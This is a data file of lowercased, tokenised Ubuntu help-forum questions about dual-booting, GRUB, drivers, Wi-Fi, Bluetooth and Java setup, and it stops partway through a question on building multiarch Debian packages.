395975	dell xps 15 ( l521x ) dualboot with windows 8.1 and ubuntu	my dell xps 15 has 1tb hdd and 32g ssd . i 've installed newest ubuntu on ssd ( before that i 've disabled intel smart response technology by setting ata operation to ahci in bios ) and after that i 've installed windows 8.1 on hdd . strange thing is that i can not disable intel rapid start technology because it is grayed out in bios . the problem is that after a day of using both operating systems my windows 8.1 fails to boot going to infinite loop of repairing etc .
395976	decision for ubuntu or lubuntu on little bit old notebook	currently i have an acer aspire 2930 with 3 gb ram , and according to the net , lubuntu is the lightest ubuntu derivative . can you guys tell me technically ( but not to technical ) how could lubuntu become lighter than normal ubuntu ? what are advantages and disadvantages of each os ? should i choose lubuntu or ubuntu to be dual-booted with windows 7 on my aspire ? sorry for this such question , i 'm just new to ubuntu
395977	how to view the list of c library functions ?	i 'm a newbie in linux programming . i found that the way to view the list of system calls in linux via command-line is : man syscalls but now i want to view the list of c library functions , how can i do that ? which command will help me list the c library functions ? and another question , where are system calls and c library functions manual pages located ? thank you .
395979	problems with hp mini 1204	after installing 32-bit ubuntu 12.04 on a hp mini 1204 , i 've experienced boot problems , display problems , wireless problems . the laptop had win xp before , thinking actually going back . minor problems before
395982	grub issue with 12.04 installed on wd passport	having trouble getting ubuntu to boot from my external hard drive . installed fine from live cd but upon booting i got `` error : unknown filesystem '' and it gave me a grub rescue > prompt . after a bit of reading i stumbled across answers like this grub rescue - error : unknown filesystem but my problem is running ls does n't even show the drive that i 've installed on . i 've tried reinstalling several times and i tried running boot-repair and it made no difference . is there something obvious i 'm doing wrong or is this likely to be some sort of hardware incompatibility ?
395985	problems with eclipse and updated java version	i 'm new in java . i 've installed eclipse and everything was ok till the moment i 've updated java from 1.6 to 1.7 . but today when i tried to open eclipse i 've got the following problem : *jvm terminated . exit code=13 /usr/bin/java ... * . then i tried to do it from terminal and i 've got another error : *java hotspot ( tm ) server vm warning : you have loaded library /usr/lib/eclipse/plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.100.dist/eclipse_1408.so which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . * i have no idea how to deal with this problem . i 'm using ubuntu 12.04 64bit please , help me !
395986	ubuntu installation shows used space as free	i wanted to dual boot ubuntu and windows 8 . i followed instruction found in internet to create unallocated space from disk management in windows 8 . but , i can not see that space in my ubuntu installation window . please look at the screenshot below : kindly suggest how can i manage to dual boot windows 8 and ubuntu in this case
395987	what ubuntu graphic drivers should i download for my ubuntu 13.10 ?	i am using a radeon hd 7690m ( 1 gb gddr5 dedicated )
395990	update check error 12.04	when ever i check for update , while updating the cache this error occurs . w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 8771adb0816950d8 , w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . please help me out.. thanks in advance
395991	no boot from usb option after booting to windows 8	i removed a hard drive with only ubuntu on it from my laptop ( a lenovo z710 ) and replaced it with a hard drive containing only windows 8 . before booting to the windows drive , i put the ubuntu drive in a usb enclosure and successfully booted via usb a number of times . after booting to the windows drive just once , i no longer have a boot from usb option . i have no fast boot option in my bios . if i set the boot mode to legacy support instead of uefi , i get the choice to boot from usb hdd 4th on the list , but selecting that gives me a an error about no operating system found . i 'm not sure if this is a question about the difference between a live usb and a drive with ubuntu installed , or a question about preventing windows from blocking access to usb boot . does anybody know how i can get to boot from the ubuntu drive again without having to put it back in the computer ? edit the output from boot repair , generated while running ubuntu with the drive inside the computer , can be found at http : //paste.ubuntu.com/6641575/ . boot repair output while running from the ubuntu drive via usb : http : //paste.ubuntu.com/6641859/ boot repair output , run off a livedvd after booting to windows has removed the option to boot from usb in the boot options : paste.ubuntu.com/6642074/ ( i do n't have the reputation to make it a link , sorry ) interestingly , while doing the boots necessary to generate those boot repair outputs i did get to boot ubuntu from usb after booting from windows multiple times ( always shutting down from windows , never restarting ) . i did not lose the usb boot option until windows did a `` update and restart '' .
395992	where to go from the purple screen	i am 100 % new and have 0 % experience with ubuntu . i can safely say i do n't know nor understand 90 % of the things i 've seen and done so far regarding this . i 'm using a bootable usb stick to boot this . i 'm on windows 7 , if that matters . i managed to get to the purple screen where they show a keyboard in a circle being equivalent to a man . by pressing a button on my keyboard , it brought me to a language selection menu where i selected my preferred language ( english ) . now i am at a screen with `` ubuntu ; persistent mode ; live mode ; install ; file integrity check ; memory test '' and more buttons ranging from `` f1 help '' to `` f6 other options '' . now here comes the problem . i tried several times ( by pressing enter ) on persistent mode , live mode and install , and after a black screen with scrolling white things that are too fast to read , my screen turns black with a blue rectangle ticking around reading `` input not supported '' . sometimes when i get this screen , pressing ctrl+alt+del reboots the computer , and sometimes it does n't work and i have to force shutdown the computer by holding the on button . also : i tried looking for solutions online , and saw some stuff regarding graphics or something like that , and something about grub . no idea what any of those mean , hence i came here to type out . from all these you should be able to tell how illiterate i am on this matter . [ another not-so-important problem ] i have tried using this on my asus laptop ( windows 8 ) , but apparently i had to do some stuff to be able to boot using usb . i managed to find the way to do it online , but after booting using the usb , it does n't show anything and just starts the laptop like normal .
395993	dualshock 4 controller configuration with xboxdrv	i 'm trying to configure my new dualshock 4 controller using xboxdrv . it shows up as a generic gamepad and i 'd like to map the events to the corresponding 360 events . i 've managed to map the axis correctly , but the button presses are not working . i used the example ds3 configuration from xboxdrv 's repo , pointing the /dev/ to the correct device . # ! /bin/sh # example configuration for the playstation 3 controller # # note this only works when connected with usb , when using bluetooth a # different configuration is required . xboxdrv \ -- evdev /dev/input/by-id/usb-sony_computer_entertainment_wireless_controller-event-joystick \ \ -- evdev-absmap abs_x=x1 , abs_y=y1 \ -- evdev-absmap abs_z=x2 , abs_rz=y2 \ -- evdev-absmap abs_ # 48=lt , abs_ # 49=rt \ \ -- evdev-keymap btn_thumb=tl , btn_thumb2=tr \ -- evdev-keymap btn_base5=lb , btn_base6=rb \ -- evdev-keymap key_ # 1=a , key_ # 0=b , key_ # 2=x , key_ # 3=y \ -- evdev-keymap btn_trigger=back , key_ # 720=guide , btn_top=start \ -- evdev-keymap btn_top2=du , btn_pinkie=dr , btn_base=dd , btn_base2=dl \ \ -- axismap -y1=y1 , -y2=y2 \ `` $ @ '' # eof # any advice ?
395995	ps1 set to display desktop	how do i set my default ps1 to ~/desktop ? i have tried changing it in my ~/.bashrc but to no avail . can someone give out a detailed solution to be able to make changes to ps1 to the directory we would like to have upon starting the terminal ?
395996	kernel panic - not syncing : waiting tid list traversal - adaptec scsi card 29320alp - ubuntu 12.04 lts 32 bit	first : i am a linux newbie . do n't hurt me : - ) ! configuration : old bios ( 2003 ) , ata bus for harddisk . adaptec scsi 29320alp card in pci slot , default settings . scsi cable with terminator at one end : end without terminator connected to adaptec card , end with terminator connected to an magnetic/optical removeable drive . the adaptec scsi bios sees the drive correctly as devive # 0 , the card itself is address # 7 . when installing ubuntu 12.04 lts / 32 bit on the computer , the installation stopped front up and dropped to the text monitor with kernel panic ( as in title ) and could not continue . i removed the scsi cable from the adaptec ( i kept the adaptec in the computer ) , and now ubuntu could be installed . after installation , i re-attached the scsi cable to the adaptec . now , ubuntu again dropped to the text monitor with kernel panic ( as in title ) and could not continue . suggestions ?
395997	limiting pidgin indicator-messages in notification bar ?	ubuntu 13.04 here - notification-indicator for pidgin displays an enthusiastic amount of chat-history to the point where the panel scrollbar is a couple of screen heights . i 'm sure some folks would like to see a list of chats that are hundreds of hours old , but my preference would be to pare this down a bit . i 've looked in the various tweek tools , pidgin plug-ins settings ( including .purple/prefs.xml ) , and searched here but , short of removing pidgin altogether , have n't been able to locate a solution . optimally , i 'd like to limit the number of pidgin messages displayed in the notification indicator and have the option to reverse-sort the list so that i see the notifications in lifo order . bug report : https : //bugs.launchpad.net/ubuntu/+source/pidgin-libnotify/+bug/1175537
395998	how to add init scripts to liveusb from windows	currently i have a liveusb with ubuntu 14.04 installed and trying to add sudo mount -o remount , rw /cdrom to init script so my read-only part of liveusb can be remounted as read-write partition . what i got is this refrence ( how to install an init.d script in ubuntu ? ) but it seems that i need to do it from ubuntu so any idea to do it from windows ?
395999	system hangs on boot when detecting cpu frequencies	i have a fujitsu-siemens amilo a 1630 laptop , flashed with the 1.05 bios from uniwill ( identical to uniwill 258ka0 ) . lately the system ( ubuntu 12.04.3 ) wo n't boot ( neither in normal or recovery mode ) , it stops when listing the available cpu frequencies ( i have a amd athlon 3200+ cpu ) . see picture : ubuntu boot fails when listing cpu frequencies the boot fails with the following screen with the verbose option in grub : processor context corrput i have tried to load stresslinux , but it would only boot in failsafe mode and it lists cpufreq as a service that failed to load . i was wondering if that service can be disabled when booting via grub , but i did n't find a proper answer ( somebody mentioned cpufreq=off for another linux distro , but that did n't work for me ) . i 've already tested the memory with memtest86 and it completed successfully a couple of times . i 'm not a linux pro and i 'm out of ideas .
396000	install hd7950 and r9 290x on 13.10	i 'm litecoin mining with a r9 290x on ubuntu 13.10 . everithing was running fine . now i want to attach a hd7950 to the system . i have uninstalled the properitary drivers , attached the hd7950 and reinstalled the drivers : sudo apt-get install fglrx-updates fglrx-amdcccle-updates fglrx-updates-dev everything runs fine but when i put sudo aticonfig -- lsa to my console there is only the hd7950 shown : * 0 . 02:00.0 amd radeon hd 7900 series * - default adapter it is possible and how to get the two graphic cards with different chip working ? edit : lspci show two cards with correct naming its important to me to use the properitary drivers because if performance
396001	dual boot ubuntu 13.10 and windows 8 preinstalled	i know that this forum is full of questions like mine , i red a lot of that questions , but till today i 'm not able to boot windows on my computer . my computer is a samsung i5 with preinstalled windows 8 . i was following the guide of this theard installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) ( the one with 139 `` likes '' ) and i installed ubuntu 12.10 ( now i update it to 13.10 ) , disabling secure boot and enabling `` csm '' , but i never was able to boot my windows 8 again . when i was trying to use the `` boot repair '' app i got after rebooting black screen with this error : error : file '/boot/grub/i386-pc/normal mod ' not found grub rescure > then i reinstalled ubuntu trough the live dvd and ubuntu was working fine . but i would like to have also windows 8 and when i try to boot it from the ubuntu boot menu the computer reboots and goes back to the boot menu . so is there anyway to fix this grub problems and boot also windows 8 ?
396003	no bass in sound on ubuntu 13.10 headphones	most of the time jacking in my headphones and putting on music i get sound but no bass , sometimes though when booting ubuntu it 's completely fine with good sound . on booting windows , there 's no problem like this . upon experiencing this problem i though it to be an equalization issue and i installed pulseaudio . running qpaeq starts the program and i setup a nice eq there . i hear a difference in sound using the equalizer but the bass just never gets up to normal levels . i also made sure that the sound output switcher worked properly ( before i heard my built-in speakers at the same time as the headphones ) so now when i plugin the headphones , sound switches to only them - alas no bass . in rare cases upon start up the sound is great , no problem at all , but that 's kind of rare . edit : if i suspend the os and re-login , the sound is fine . i 've been looking into some drivers but i 'm not sure where to find the right ones . do n't know if the following information is needed : sudo aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : ca0132 analog [ ca0132 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : ca0132 digital [ ca0132 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 some way of pointing me in the right direction to fix this ?
396005	undefined reference to 'dlopen ' in installing phonetisaurus	i was trying to install phonetisaurus . in the classical steps of configure , make , make install . i was stuck on make , where it produced this error . i have googled a lot , and many suggested appending -ldl at the back , but as you can see below , it 's already there . make [ 3 ] : entering directory `/opt/openfst-1.3.4/src/bin' g++ -dhave_config_h -i./../include -i./../script -g -o2 -mt fstarcsort.o -md -mp -mf .deps/fstarcsort.tpo -c -o fstarcsort.o fstarcsort.cc mv -f .deps/fstarcsort.tpo .deps/fstarcsort.po /bin/bash ../../libtool -- tag=cxx -- mode=link g++ -g -o2 -o fstarcsort fstarcsort.o ../script/libfstscript.la ../lib/libfst.la -lm -ldl libtool : link : g++ -g -o2 -o .libs/fstarcsort fstarcsort.o ../script/.libs/libfstscript.so ../lib/.libs/libfst.so -lm -ldl ../script/.libs/libfstscript.so : undefined reference to `dlopen' ../script/.libs/libfstscript.so : undefined reference to `dlerror' i totally have no idea what this meant , and please help
396007	press s to skip mounting error after windows 8.1 installation	i have ubuntu 13.10 and i have just installed windows 8.1 on another drive . after that i restarted to ubuntu and i had to press s twice in order to enter . when i clicked on my drives `` dati '' and `` volume '' from my file manager i could not access to them and i got the following error : [ mntent ] : invalid line 9 in /etc/fstab the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda1 ' : operazione non permessa the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb3 ' : operazione non permessa the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . here is my /etc/fstab : http : //pastebin.com/raw.php ? i=k3jyvay6 here is the output of : sudo blkid : http : //pastebin.com/raw.php ? i=qqggqfjx how can i solve the problem ? thanks
396009	wifi connected but no internet access	i hope you can help me , because i tried to find a solution in internet but it was impossible to resolve my problem . well , with ubuntu , the wifi works because i can see the logo , it says that it 's connected , but when i try to go on internet , it 's impossible and i really do n't know why . to help you : damien @ damien-305u1a : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' damien @ damien-305u1a : ~ $ lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 2232:1008 bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 002 : id 0a5c:219c broadcom corp . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub damien @ damien-305u1a : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11abg essid : '' bell678 '' mode : managed frequency:2.452 ghz access point : d8:6c : e9:30:90:25 retry long limit:7 rts thr : off fragment thr : off power management : off damien @ damien-305u1a : ~ $ ping www.google.ca ping : unknown host www.google.ca damien @ damien-305u1a : ~ $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] wrestler [ radeon hd 6320 ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] wrestler hdmi audio 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] family 14h processor root port 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) 00:15.2 pci bridge : advanced micro devices , inc. [ amd/ati ] sb900 pci to pci bridge ( pcie port 2 ) 00:15.3 pci bridge : advanced micro devices , inc. [ amd/ati ] sb900 pci to pci bridge ( pcie port 3 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 7 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) damien @ damien-305u1a : ~ $ lspci -nn | grep -i net 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) damien @ damien-305u1a : ~ $ sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 30:14:4a:1a:14:94 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.2.27 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : fea00000-fea03fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 06 serial : e8:03:9a:94:29 : f6 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:40 ioport : e000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff damien @ damien-305u1a : ~ $ uname -r -m 3.11.0-14-generic i686 damien @ damien-305u1a : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback damien @ damien-305u1a : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : e8:03:9a:94:29 : f6 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : off - device : eth1 [ bell678 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : wl state : connected default : yes hw address : 30:14:4a:1a:14:94 capabilities : speed : 58 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *bell678 : infra , d8:6c : e9:30:90:25 , freq 2452 mhz , rate 54 mb/s , strength 65 wpa2 hp009141 : ad-hoc , 02:28:88:82:95:7c , freq 2457 mhz , rate 11 mb/s , strength 29 jennifer : infra , e8:40 : f2:30 : a9:79 , freq 2412 mhz , rate 54 mb/s , strength 27 wpa wpa2 purplemoose-guest : infra , ea:40 : f2:30 : a9:7b , freq 2412 mhz , rate 54 mb/s , strength 27 ipv4 settings : address : 192.168.2.27 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.2.1 dns : 192.168.2.1 damien @ damien-305u1a : ~ $ sudo rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 3 : samsung-wlan : wireless lan soft blocked : no hard blocked : no 4 : samsung-bluetooth : bluetooth soft blocked : no hard blocked : no thanks and please help me
396010	updating java from ibm to oracle	i have ibm java installed on my xubuntu 12.04 machine.i want to change it to oracle java.i downloaded jdk1.7.0_45 and extracted it to /usr/local/java.then i edited the /etc/profile file as follows : java_home=/usr/local/java/jdk1.7.0_45 path= $ path : $ home/bin : $ java_home/bin jre_home=/usr/local/java/jdk1.7.0_45/jre path= $ path : $ home/bin : $ jre_home/bin export java_home export jre_home export path and then executed the command . /etc/profile.but when i do java -version it still shows ibm java and sudo update-alternatives -- config javac does not list oracle java . i badly need oracle java as android sdk does not support ibm java . thanks in advance .
396013	touchpad disabled lenovo x201 laptop	after attempting to load a usb vid cam , i restarted my laptop and the touchpad stopped working . the red `` nipple '' dot still works , but i desperately need the touchpad for my work . i have read every post and tried the solutions i could manage . i do n't understand the terminal commands , but have tried the ones i could manage including fn+f8 and synclient touchpadoff=0 . please help if you can .
396014	in my system the ubuntu software center is getting closed automatically , how solve it ?	ubuntu software center is getting closed automatically , i 'm running ubuntu 12.04 on intel i5 processor .
396021	what is causing my intel 7260 bluetooth device to disconnect when i unblock it with rfkill ?	solution : the problem appears to be that the bluetooth module does not work well with xhci in linux . there is a bios setting labeled `` xhci pre-boot mode '' , which must be set to `` disabled '' . if it is not , then linux will treat the bluetooth module as if it is connected to an xhci bus instead of an ehci bus , causing communication errors . however , this fix will disable usb 3.0 on your system . i do not have a better solution at this moment , but at least this works . i have a new asus ux301la laptop , and i am running ubuntu gnome 13.10 ( saucy ) . the kernel appears to know about the laptop 's bluetooth device at boot , but it disappears whenever i use rfkill to unblock bluetooth . for example : $ sudo rfkill block bluetooth $ dmesg | tail -5 [ 2024.876537 ] usb 2-4 : new full-speed usb device number 8 using xhci_hcd [ 2024.894043 ] usb 2-4 : new usb device found , idvendor=8087 , idproduct=07dc [ 2024.894053 ] usb 2-4 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 2024.908190 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 2024.908271 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 2025.057051 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated $ sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : hci0 : bluetooth soft blocked : yes hard blocked : no $ sudo hciconfig -a hci0 : type : br/edr bus : usb bd address : xx : xx : xx : xx : xx : xx acl mtu : 1021:5 sco mtu : 96:5 down rx bytes:568 acl:0 sco:0 events:29 errors:0 tx bytes:390 acl:0 sco:0 commands:29 errors:0 features : 0xff 0xfe 0x0f 0xfe 0xdb 0xff 0x7b 0x87 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : rswitch hold sniff link mode : slave accept $ sudo rfkill unblock bluetooth $ dmesg | tail -1 [ 2391.749122 ] usb 2-4 : usb disconnect , device number 8 $ sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no $ sudo hciconfig -a [ no output ] edit : the bluetooth device shows up as an intel 7260 wireless usb device , id 8087:07dc . the only information i have found that might be relevant is a bug for which a fix has been issued , mentioned on launchpad here : support for intel 7260 bluetooth [ 8087:07dc ] edit : i updated the firmware to the new 22.1.7.0 version from intel 's website ( saucy ships with 22.0.7.0 ) , and the same issue occurs . edit : further digging around in the logs shows that the bluetooth usb device is completely disconnected when i run the unblock command : $ lsusb -d 8087:07dc bus 001 device 007 : id 8087:07dc intel corp. $ rfkill unblock bluetooth $ lsusb -d 8087:07dc [ no output ] $ dmesg | tail -1 [ 438.284647 ] usb 1-4 : usb disconnect , device number 7 edit : updating the iwlwifi driver to a ( newer ) backport from the 3.13 kernel does not help . the current version of the driver : $ modinfo iwlwifi filename : /lib/modules/3.11.0-15-generic/updates/drivers/net/wireless/iwlwifi/iwlwifi.ko version : backported from linux ( v3.13-rc8-0-g7e22e91 ) using backports v3.13-rc8-1-0-gae71bd3 license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : d description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : f6c7f0e202757b474065f3b alias : pci : v00008086d0000095asv*sd00005490bc*sc*i* [ ... trimmed several `` alias '' lines ... ] alias : pci : v00008086d00004232sv*sd00001201bc*sc*i* depends : compat , cfg80211 vermagic : 3.11.0-15-generic smp mod_unload modversions parm : debug : debug output mask ( uint ) parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : agg tx , 4 : agg rx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable , 2=enable ( default : 0 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) edit : as bernhard suggested in the responses , i tried to force the adaptor on using the command echo `` on '' > /sys/class/bluetooth/hci0/device/../power/control . while bluetooth was blocked via rfkill , this appeared to have no effect , and hciconfig hci0 up responded that the device was still blocked . when bluetooth was unblocked using rfkill , /sys/class/bluetooth/hci0 does not exist , so the attempt to manually turn it on fails . i attempted to add this to /etc/rc.local as well , and there was no apparent difference compared to simply running the commands as root on the console . edit : i emailed the intel wifi developers , and they issued this incredibly helpful response : hello , i am afraid you are asking the wrong people . we are wifi people and not bluetooth . thanks , ( name removed ) i will attempt to hack the bluetooth drivers myself to see if i can coax any more debugging information out of them . does anybody have any suggestions to help me out ? has anybody experienced this before ? are there any ubuntu users who have an asus ux301la who might have any tips ? let me know what other information might be useful , and i 'll post it . i just did n't want to overload this first post with useless data .
396025	apt-get problem	every time i try to install something by writing sudo apt-get install in the terminal , i have always the same answer : e : the package linux-image-3.0.0-32-generic needs to be reinstalled , but i ca n't find an archive for it . i ca n't remove and reinstall this package ( same error ) and i do n't know how i can correct this error . thank you very much !
396028	how do i apply a cursor theme in ubuntu 13.10	i am running ubuntu 13.10 and i found a cursor theme that i really like however , when i use the gnome tweak tool to apply it it doesnât change but when i open a program like firefox its there but not on the desktop or the launcher bar . i have tried logging out and back in 3 times and restarting twice . please help me i do not know what i am doing wrong .
396030	how do i create a multiarch deb ?	i am trying to make a package that will install on ubuntu 12.04 - 13 . * on 1386 and amd64 . i 've figured out that on the amd64 the only difference is that i need to install the 32 bit libraries . depending on ia32-libs works when the system has it ( even though it is overkill ) but 13 . * does not even have that package . therefore i am trying to install via the ' : i386 ' extension . when i do sudo apt-get install blah : i386 ... etc it works fine . the following control file yields the message : `` dependency not satisfiable : libgcc1 : i386 '' on 12.04 . package : foo version : 1.0-1 section : base priority : optional maintainer : bar @ gmail.com architecture : all depends : libgcc1 : i386 , gcc-4.6-base : i386 , libstdc++5 : i386 , libstdc++6 : i386 , libsasl2-2 : i386 , libgstreamermm-0.10-2 : i386 , libfreetype6 : i386 , libfontconfig1 : i386 , libx11-6 : i386 , libxrender1 : i386 , libice6 : i386 , libxext6 : i386 , libsm6 : i386 description : foo is awesome foo is really awesome installed-size : 71140 therefore as per a few other places say , i made the following control file : package : foo-amd64 version : 1.0-1 section : base priority : optional maintainer : bar @ gmail.com architecture : amd64 depends : foo , libgcc1 : i386 , gcc-4.6-base : i386 